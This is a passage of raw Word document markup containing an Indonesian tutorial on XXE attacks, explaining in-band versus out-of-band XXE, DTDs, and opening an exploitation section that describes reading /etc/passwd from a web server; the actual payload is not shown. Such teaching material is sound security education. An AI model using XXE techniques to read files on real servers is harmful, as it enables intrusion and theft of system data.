        <w:t xml:space="preserve"> Ketika penyerang mendapatkan response langsung dari XXE payload yang dimasukkan, </w:t>
      </w:r>
      <w:r w:rsidR="00C000CE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>maka itu adalah in-band XXE (</w:t>
      </w:r>
      <w:r w:rsidR="00BF18C8">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>merupakan XXE yang paling sering terjadi</w:t>
      </w:r>
      <w:r w:rsidR="00C000CE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidR="006D02D5">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Sedangkan out-of-band</w:t>
      </w:r>
      <w:r w:rsidR="008D650E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, adalah ketika </w:t>
      </w:r>
      <w:r w:rsidR="00BF18C8">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>penyerang tidak mendapatkan response langsung dari XXE payload yang dimasukkan</w:t>
      </w:r>
      <w:r w:rsidR="00411BED">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00483920">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00483920" w:rsidRPr="008962FE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Agar lebih jelas, saya akan memberikan contoh dari in-band XXE dan out-of-band XXE pada bagian selanjutnya</w:t>
      </w:r>
      <w:r w:rsidR="00483920">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tetapi sebelum itu, saya ingin membahas apa itu DTD. </w:t>
      </w:r>
      <w:r w:rsidR="00F91113">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>DTD atau Document Type Definition merupakan aturan yang harus diikuti oleh suatu dokumen XML. Kasarnya DTD itu seperti</w:t>
      </w:r>
      <w:r w:rsidR="006D6F03">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> struktur atau </w:t>
      </w:r>
      <w:r w:rsidR="00F91113">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">building blocks dari dokumen XML. </w:t>
      </w:r>
      <w:r w:rsidR="00041B46">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Segala elemen yang dituliskan di dalam DTD boleh digunakan dalam XML document. Nah, hal itu membuat DTD sangatlah berbahaya jika penyerang berhasil memanipulasi DTD tersebut. </w:t>
      </w:r>
      <w:r w:rsidR="00E71D33">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">DTD ditandai dengan </w:t>
      </w:r>
      <w:r w:rsidR="00E71D33" w:rsidRPr="00E71D33">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>&lt;!DOCTYPE</w:t>
      </w:r>
      <w:r w:rsidR="00E71D33">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00041B46">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Berikut adalah contoh dari DTD agar lebih jelas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650F9D18" w14:textId="394E30C2" w:rsidR="009435D3" w:rsidRPr="00B74FFD" w:rsidRDefault="009435D3" w:rsidP="00B74FFD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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B74FFD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&lt;!DOCTYPE NEWSPAPER [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A7F62" w14:textId="77777777" w:rsidR="009435D3" w:rsidRPr="00B74FFD" w:rsidRDefault="009435D3" w:rsidP="009435D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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B74FFD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&lt;!ELEMENT NEWSPAPER (ARTICLE+)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C58806" w14:textId="77777777" w:rsidR="009435D3" w:rsidRPr="00B74FFD" w:rsidRDefault="009435D3" w:rsidP="009435D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  <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B74FFD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&lt;!ELEMENT ARTICLE (HEADLINE,BYLINE,LEAD,BODY,NOTES)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F0D7FE" w14:textId="48C2B5C2" w:rsidR="006C1CE1" w:rsidRDefault="009435D3" w:rsidP="00B74FFD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 w:rsidRPr="00B74FFD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&lt;!ELEMENT HEADLINE (#PCDATA)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C3B2DC" w14:textId="7D36E336" w:rsidR="00435B6A" w:rsidRDefault="00435B6A" w:rsidP="00B74FFD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 w:rsidRPr="00435B6A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 xml:space="preserve">… </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E952FD8" w14:textId="39375F25" w:rsidR="002F0370" w:rsidRPr="00364FB5" w:rsidRDefault="00D53791" w:rsidP="00364FB5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 xml:space="preserve">Anggap ini adalah isi dari file </w:t>
      </w:r>
      <w:r w:rsidR="0073262E" w:rsidRPr="0073262E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newspaper.dtd</w:t>
      </w:r>
      <w:r w:rsidR="0073262E">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00EB7BA4">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Kita bisa lihat di sini, </w:t>
      </w:r>
      <w:r w:rsidR="00481CF4">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dalam root element </w:t>
      </w:r>
      <w:r w:rsidR="00481CF4" w:rsidRPr="000D7AE7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NEWSPAPER</w:t>
      </w:r>
      <w:r w:rsidR="00481CF4">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> ada </w:t>
      </w:r>
      <w:r w:rsidR="000D7AE7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">element </w:t>
      </w:r>
      <w:r w:rsidR="000D7AE7" w:rsidRPr="000D7AE7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NEWSPAPER</w:t>
      </w:r>
      <w:r w:rsidR="000D7AE7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> yang berisi </w:t>
      </w:r>
      <w:r w:rsidR="000D7AE7" w:rsidRPr="000D7AE7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ARTICLE</w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00344469" w:rsidRPr="00613BA0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ARTICLE</w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> berisi </w:t>
      </w:r>
      <w:r w:rsidR="00344469" w:rsidRPr="00613BA0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HEADLINE</w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00344469" w:rsidRPr="00613BA0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BYLINE</w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00344469" w:rsidRPr="00613BA0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LEAD</w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00344469" w:rsidRPr="00613BA0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BODY</w:t>
      </w:r>
      <w:r w:rsidR="00344469">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="009655D6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dan </w:t>
      </w:r>
      <w:r w:rsidR="00344469" w:rsidRPr="00613BA0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NOTES</w:t>
      </w:r>
      <w:r w:rsidR="009655D6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. Tipe data dari </w:t>
      </w:r>
      <w:r w:rsidR="009655D6" w:rsidRPr="00613BA0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HEADLINE</w:t>
      </w:r>
      <w:r w:rsidR="009655D6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> merupakan (</w:t>
      </w:r>
      <w:r w:rsidR="009655D6" w:rsidRPr="00613BA0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#PCDATA</w:t>
      </w:r>
      <w:r w:rsidR="009655D6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">), </w:t>
      </w:r>
      <w:r w:rsidR="008B4D8A">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">dan seterusnya. Saya potong karena sangat </w:t>
      </w:r>
      <w:r w:rsidR="008C7563">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">panjang. </w:t>
      </w:r>
      <w:r w:rsidR="00586E20">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Segala elemen yang ada dalam</w:t>
      </w:r>
      <w:r w:rsidR="00425D18">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00425D18" w:rsidRPr="0038076D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newspaper.dtd</w:t>
      </w:r>
      <w:r w:rsidR="00586E20">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> ini boleh disertakan dalam suatu dokumen XML</w:t>
      </w:r>
      <w:r w:rsidR="00373FF6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. Nah, pada serangan </w:t>
      </w:r>
      <w:r w:rsidR="007A367C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">jenis </w:t>
      </w:r>
      <w:r w:rsidR="00373FF6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">out-of-bad XXE, </w:t>
      </w:r>
      <w:r w:rsidR="007A367C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">penyerang bisa menginclude </w:t>
      </w:r>
      <w:r w:rsidR="00373FF6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>DTD</w:t>
      </w:r>
      <w:r w:rsidR="007A367C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CA4EDB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">(external DTD) </w:t>
      </w:r>
      <w:r w:rsidR="007A367C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">mereka sendiri dan </w:t>
      </w:r>
      <w:r w:rsidR="00373FF6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">memanipulasi </w:t>
      </w:r>
      <w:r w:rsidR="007A367C">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>DTD yang digunakan</w:t>
      </w:r>
      <w:r w:rsidR="00373FF6">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> untuk memvalidasi XML pada target kita, sehingga kita dapat memasukkan command-command jahat</w:t>
      </w:r>
      <w:r w:rsidR="00E07587">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D151E6" w14:textId="77777777" w:rsidR="003B736F" w:rsidRPr="00E07587" w:rsidRDefault="003B736F" w:rsidP="00E07587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</w:p>
    <w:p w14:paraId="203C0A32" w14:textId="787E5C90" w:rsidR="006C1CE1" w:rsidRPr="009F26AD" w:rsidRDefault="009F26AD" w:rsidP="006C1CE1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jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F26AD">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>How to exploit XXE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4719D755" w14:textId="149EC66F" w:rsidR="0017580B" w:rsidRPr="007F489B" w:rsidRDefault="00E108A7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>Pertama-tama saya ingin mempraktekkan serangan in-band XXE secara simple</w:t>
      </w:r>
      <w:r w:rsidR="009639CC">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12773218" w14:textId="1CFEA3BF" w:rsidR="0017580B" w:rsidRDefault="00887E58" w:rsidP="00887E58">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/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Fonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6FDC9D1E" wp14:editId="6917B713">
            <wp:extent cx="4998720" cy="3013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DDD4" w14:textId="77777777" w:rsidR="002B67D7" w:rsidRDefault="000B2AC5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 xml:space="preserve">Tidak begitu rumit bukan? </w:t>
      </w:r>
      <w:r w:rsidR="00734B80">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Pada serangan tersebut, saya mencoba untuk membaca konten /etc/passwd pada sesuatu web</w:t>
      </w:r>
      <w:r w:rsidR="00BA14FE">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00734B80">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>server</w:t>
      </w:r>
      <w:r w:rsidR="002F63AB">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="005F52C0">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Saya akan mencoba untuk menjelaskan payload saya. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29CCD546" w14:textId="77777777" w:rsidR="00154374" w:rsidRDefault="002B67D7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 w:rsidRPr="002B67D7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&lt;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377DFD3C" w14:textId="603FAE22" w:rsidR="002B67D7" w:rsidRPr="00B45E92" w:rsidRDefault="00154374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>I</w:t>
      </w:r>
      <w:r w:rsidR="002B67D7">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>ni merupakan XML Prolog</w:t>
      </w:r>
      <w:r w:rsidR="00B45E92">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>. XML Prolog bersifat tidak wajib tapi merupaka</w:t>
      </w:r>
      <w:r w:rsidR="003B736F">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00B45E92">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B45E92" w:rsidRPr="00B45E92">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>good practice</w:t>
      </w:r>
      <w:r w:rsidR="00B45E92">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B45E92">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">untuk menuliskannya dalam XML Document. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECBFAB2" w14:textId="2A77B633" w:rsidR="00702AAE" w:rsidRPr="00702AAE" w:rsidRDefault="00BF04EC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 w:rsidRPr="00702AAE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&lt;!DOCTYPE root&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16FE384E" w14:textId="40EDFFC5" w:rsidR="002D2A5A" w:rsidRDefault="00092534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 xml:space="preserve">Setiap XML document selalu memiliki yang </w:t>
      </w:r>
      <w:r w:rsidR="00D61FA1">
        <w:rPr>
          <w:rStyle w:val="jsgrdq"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:rPr>
